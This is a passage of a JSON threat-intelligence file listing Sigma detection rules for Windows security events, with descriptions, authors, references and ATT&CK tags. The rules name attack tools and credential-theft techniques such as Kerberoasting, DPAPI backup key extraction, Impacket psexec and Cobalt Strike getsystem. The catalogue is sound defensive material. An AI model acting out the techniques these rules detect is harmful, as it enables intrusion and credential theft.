category", "logsource.product": "windows", "refs": [ "https://github.com/netero1010/EDRSilencer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hktl_edr_silencer.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "98054878-5eab-434c-85d4-72d4e5a3361b", "value": "HackTool - EDRSilencer Execution - Filter Added" }, { "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-09-12", "falsepositive": [ "Legitimate use of remote PowerShell execution" ], "filename": "win_security_remote_powershell_session.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_remote_powershell_session.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "13acf386-b8c6-4fe0-9a6e-c4756b974698", "value": "Remote PowerShell Sessions Network Connections (WinRM)" }, { "description": "An attacker can use the SID history attribute to gain additional privileges.", "meta": { "author": "Thomas Patzke, @atc_project (improvements)", "creation_date": "2017-02-19", "falsepositive": [ "Migration of an account into a new domain" ], "filename": "win_security_susp_add_sid_history.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://adsecurity.org/?p=1772", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_add_sid_history.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1134.005" ] }, "related": [ { "dest-uuid": "b7dc639b-24cd-482d-a7f1-8897eda21023", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2632954e-db1c-49cb-9936-67d1ef1d17d2", "value": "Addition of SID History to Active Directory Object" }, { "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-05-09", "falsepositive": [ "Legitimate used of encrypted ZIP files" ], "filename": "win_security_susp_opened_encrypted_zip.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/sbousseaden/status/1523383197513379841", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "00ba9da1-b510-4f6b-b258-8d338836180f", "value": "Password Protected ZIP File Opened" }, { "description": "Detects write access requests to the Windows Defender exclusions registry keys. This could be an indication of an attacker trying to request a handle or access the object to write new exclusions in order to bypass security.\n", "meta": { "author": "@BarryShooshooga, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-10-26", "falsepositive": [ "Unknown" ], "filename": "win_security_windows_defender_exclusions_write_access.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_windows_defender_exclusions_write_access.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", "value": "Windows Defender Exclusion Registry Key - Write Access Requested" }, { "description": "Detects WRITE_DAC access to a domain object", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-09-12", "falsepositive": [ "Unknown" ], "filename": "win_security_ad_object_writedac_access.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html", "https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html", "https://threathunterplaybook.com/library/windows/active_directory_replication.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_object_writedac_access.yml" ], "tags": [ "attack.defense-evasion", "attack.t1222.001" ] }, "related": [ { "dest-uuid": "34e793de-0274-4982-9c1a-246ed1c19dee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "028c7842-4243-41cd-be6f-12f3cf1a26c7", "value": "AD Object WriteDAC Access" }, { "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", "meta": { "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "creation_date": "2020-08-06", "falsepositive": [ "Unknown" ], "filename": "win_security_smb_file_creation_admin_shares.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://securitydatasets.com/notebooks/atomic/windows/lateral_movement/SDWIN-200806015757.html?highlight=create%20file", "https://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_smb_file_creation_admin_shares.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b210394c-ba12-4f89-9117-44a2464b9511", "value": "SMB Create Remote File Admin Share" }, { "description": "Detects service ticket requests using RC4 encryption type", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-02-06", "falsepositive": [ "Service accounts used on legacy systems (e.g. NetApp)", "Windows Domains with DFL 2003 and legacy systems" ], "filename": "win_security_susp_rc4_kerberos.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://adsecurity.org/?p=3458", "https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml" ], "tags": [ "attack.credential-access", "attack.t1558.003" ] }, "related": [ { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "496a0e47-0a33-4dca-b009-9e6ca3591f39", "value": "Suspicious Kerberos RC4 Ticket Encryption" }, { "description": "Detects execution of Impacket's psexec.py.", "meta": { "author": "Bhabesh Raj", "creation_date": "2020-12-14", "falsepositive": [ "Unknown" ], "filename": "win_security_impacket_psexec.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20230329171218/https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_impacket_psexec.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "32d56ea1-417f-44ff-822b-882873f5f43b", "value": "Impacket PsExec Execution" }, { "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", "meta": { "author": "Samir Bousseaden", "creation_date": "2019-04-03", "falsepositive": [ "Update the excluded named pipe to filter out any newly observed legit named pipe" ], "filename": "win_security_lm_namedpipe.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/menasec1/status/1104489274387451904", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lm_namedpipe.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", "value": "First Time Seen Remote Named Pipe" }, { "description": "Detects the first occurrence of a modification to Group Policy Object Attributes to add privileges to user accounts or use them to add users as local admins.\n", "meta": { "author": "Elastic, Josh Nickels, Marius Rothenbücher", "creation_date": "2024-09-04", "falsepositive": [ "Users allowed to perform these modifications (user found in field SubjectUserName)" ], "filename": "win_security_susp_group_policy_abuse_privilege_addition.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/group-policy-abuse-for-privilege-addition.html#_setup_275", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_group_policy_abuse_privilege_addition.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1484.001" ] }, "related": [ { "dest-uuid": "5d2be8b9-d24c-4e98-83bf-2f5f79477163", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1c480e10-7ee1-46d4-8ed2-85f9789e3ce4", "value": "Group Policy Abuse for Privilege Addition" }, { "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-05", "falsepositive": [ "Unknown" ], "filename": "win_security_susp_scheduled_task_creation.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4698", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_creation.yml" ], "tags": [ "attack.execution", "attack.privilege-escalation", "attack.persistence", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3a734d25-df5c-4b99-8034-af1ddb5883a4", "value": "Suspicious Scheduled Task Creation" }, { "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", "meta": { "author": "Orlinum , BlueDefenZer", "creation_date": "2021-11-17", "falsepositive": [ "Administrator activity", "Proxy SSL certificate with subject modification", "Smart card enrollement" ], "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" ], "tags": [ "attack.privilege-escalation", "attack.credential-access" ] }, "uuid": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", "value": "ADCS Certificate Template Configuration Vulnerability with Risky EKU" }, { "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", "meta": { "author": "Tim Rauch (Nextron Systems), Elastic (idea)", "creation_date": "2022-09-15", "falsepositive": [ "Unknown" ], "filename": "win_security_service_installation_by_unusal_client.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", "https://www.x86matthew.com/view_post?id=create_svc_rpc", "https://twitter.com/SBousseaden/status/1490608838701166596", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_service_installation_by_unusal_client.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1543" ] }, "related": [ { "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", "value": "Service Installed By Unusual Client - Security" }, { "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-02-19", "falsepositive": [ "User using a disabled account" ], "filename": "win_security_susp_failed_logon_reasons.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/SBousseaden/status/1101431884540710913", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4625", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.initial-access", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9eb99343-d336-4020-a3cd-67f3819e68ee", "value": "Account Tampering - Suspicious Failed Logon Reasons" }, { "description": "Detects the modification of Group Policy Objects (GPO) to add a startup/logon script to users or computer objects.\n", "meta": { "author": "Elastic, Josh Nickels, Marius Rothenbücher", "creation_date": "2024-09-06", "falsepositive": [ "Legitimate execution by system administrators." ], "filename": "win_security_susp_group_policy_startup_script_added_to_gpo.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/startup-logon-script-added-to-group-policy-object.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_group_policy_startup_script_added_to_gpo.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1484.001", "attack.t1547" ] }, "related": [ { "dest-uuid": "5d2be8b9-d24c-4e98-83bf-2f5f79477163", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "123e4e6d-b123-48f8-b261-7214938acaf0", "value": "Startup/Logon Script Added to Group Policy Object" }, { "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", "meta": { "author": "Teymur Kheirkhabarov, Ecco, Florian Roth (Nextron Systems)", "creation_date": "2019-10-26", "falsepositive": [ "Unlikely" ], "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1134.001", "attack.t1134.002" ] }, "related": [ { "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "677569f9-a8b0-459e-ab24-7f18091fa7bf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", "value": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security" }, { "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-06-20", "falsepositive": [ "Unknown" ], "filename": "win_security_dpapi_domain_backupkey_extraction.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dpapi_domain_backupkey_extraction.yml" ], "tags": [ "attack.credential-access", "attack.t1003.004" ] }, "related": [ { "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4ac1f50b-3bd0-4968-902d-868b4647937e", "value": "DPAPI Domain Backup Key Extraction" }, { "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2020-10-18", "falsepositive": [ "Unknown" ], "filename": "win_security_invoke_obfuscation_via_rundll_services_security.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_rundll_services_security.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", "value": "Invoke-Obfuscation RUNDLL LAUNCHER - Security" }, { "description": "Detects the installation of a well-known TAP driver service. This could be a sign of potential preparation for data exfiltration using tunnelling techniques.\n", "meta": { "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Legitimate OpenVPN TAP installation" ], "filename": "win_security_tap_driver_installation.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_tap_driver_installation.yml" ], "tags": [ "attack.exfiltration", "attack.t1048" ] }, "related": [ { "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9c8afa4d-0022-48f0-9456-3712466f9701", "value": "Tap Driver Installation - Security" }, { "description": "Detects certificate creation with template allowing risk permission subject", "meta": { "author": "Orlinum , BlueDefenZer", "creation_date": "2021-11-17", "falsepositive": [ "Administrator activity", "Proxy SSL certificate with subject modification", "Smart card enrollement" ], "filename": "win_security_adcs_certificate_template_configuration_vulnerability.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability.yml" ], "tags": [ "attack.privilege-escalation", "attack.credential-access" ] }, "uuid": "5ee3a654-372f-11ec-8d3d-0242ac130003", "value": "ADCS Certificate Template Configuration Vulnerability" }, { "description": "Detects locked workstation session events that occur automatically after a standard period of inactivity.", "meta": { "author": "Alexandr Yampolskyi, SOC Prime", "creation_date": "2019-03-26", "falsepositive": [ "Likely" ], "filename": "win_security_workstation_was_locked.yml", "level": "informational", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_workstation_was_locked.yml" ], "tags": [ "attack.impact" ] }, "uuid": "411742ad-89b0-49cb-a7b0-3971b5c1e0a4", "value": "Locked Workstation" }, { "description": "Detects read access to a domain user from a non-machine account", "meta": { "author": "Maxime Thiebaut (@0xThiebaut)", "creation_date": "2020-03-30", "falsepositive": [ "Administrators configuring new users." ], "filename": "win_security_ad_user_enumeration.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4662", "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html", "https://learn.microsoft.com/en-us/windows/win32/adschema/attributes-all", "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_user_enumeration.yml" ], "tags": [ "attack.discovery", "attack.t1087.002" ] }, "related": [ { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ab6bffca-beff-4baa-af11-6733f296d57a", "value": "Potential AD User Enumeration From Non-Machine Account" }, { "description": "Detects Obfuscated use of stdin to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Unknown" ], "filename": "win_security_invoke_obfuscation_stdin_services_security.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", "value": "Invoke-Obfuscation STDIN+ Launcher - Security" }, { "description": "Detects the creation of a user with the \"$\" character. This can be used by attackers to hide a user or trick detection systems that lack the parsing mechanisms.\n", "meta": { "author": "Ilyas Ochkov, oscd.community", "creation_date": "2019-10-25", "falsepositive": [ "Unknown" ], "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/SBousseaden/status/1387743867663958021", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_new_or_renamed_user_account_with_dollar_sign.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cfeed607-6aa4-4bbd-9627-b637deb723c8", "value": "New or Renamed User Account with '$' Character" }, { "description": "Detects suspicious processes logging on with explicit credentials", "meta": { "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton", "creation_date": "2020-10-05", "falsepositive": [ "Administrators that use the RunAS command or scheduled tasks" ], "filename": "win_security_susp_logon_explicit_credentials.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_logon_explicit_credentials.yml" ], "tags": [ "attack.t1078", "attack.lateral-movement" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "941e5c45-cda7-4864-8cea-bbb7458d194a", "value": "Suspicious Remote Logon with Explicit Credentials" }, { "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", "meta": { "author": "frack113", "creation_date": "2022-10-14", "falsepositive": [ "Unknown" ], "filename": "win_security_replay_attack_detected.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4649", "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_replay_attack_detected.yml" ], "tags": [ "attack.credential-access", "attack.t1558" ] }, "related": [ { "dest-uuid": "3fc01293-ef5e-41c6-86ce-61f10706b64a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5a44727c-3b85-4713-8c44-4401d5499629", "value": "Replay Attack Detected" }, { "description": "Detects scenarios where system auditing (i.e.: Windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when Windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications - however, it is recommended to perform these modifications in Active Directory anyways.\n", "meta": { "author": "@neu5ron, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2017-11-19", "falsepositive": [ "Unknown" ], "filename": "win_security_disable_event_auditing.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_disable_event_auditing.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "69aeb277-f15f-4d2d-b32a-55e883609563", "value": "Windows Event Auditing Disabled" }, { "description": "Detects a user log-off activity. Could be used for example to correlate information during forensic investigations", "meta": { "author": "frack113", "creation_date": "2022-10-14", "falsepositive": [ "Unknown" ], "filename": "win_security_user_logoff.yml", "level": "informational", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4634", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4647", "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_logoff.yml" ], "tags": [ "attack.impact", "attack.t1531" ] }, "related": [ { "dest-uuid": "b24e2a20-3b3d-4bf0-823b-1ed765398fb0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0badd08f-c6a3-4630-90d3-6875cca440be", "value": "User Logoff Event" }, { "description": "Detects remote service activity via remote access to the svcctl named pipe", "meta": { "author": "Samir Bousseaden", "creation_date": "2019-04-03", "falsepositive": [ "Unknown" ], "filename": "win_security_svcctl_remote_service.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20230329155141/https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_svcctl_remote_service.yml" ], "tags": [ "attack.lateral-movement", "attack.persistence", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", "value": "Remote Service Activity via SVCCTL Named Pipe" }, { "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.", "meta": { "author": "Cian Heasley", "creation_date": "2020-06-10", "falsepositive": [ "Unknown" ], "filename": "win_security_pcap_drivers.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://ragged-lab.blogspot.com/2020/06/capturing-pcap-driver-installations.html#more", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_pcap_drivers.yml" ], "tags": [ "attack.discovery", "attack.credential-access", "attack.t1040" ] }, "related": [ { "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7b687634-ab20-11ea-bb37-0242ac130002", "value": "Windows Pcap Drivers" }, { "description": "Detects failed Kerberos TGT issue operation. This can be a sign of manipulations of TGT messages by an attacker.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-02-10", "falsepositive": [ "Faulty legacy applications" ], "filename": "win_security_susp_kerberos_manipulation.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4771", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_kerberos_manipulation.yml" ], "tags": [ "attack.credential-access", "attack.t1212" ] }, "related": [ { "dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 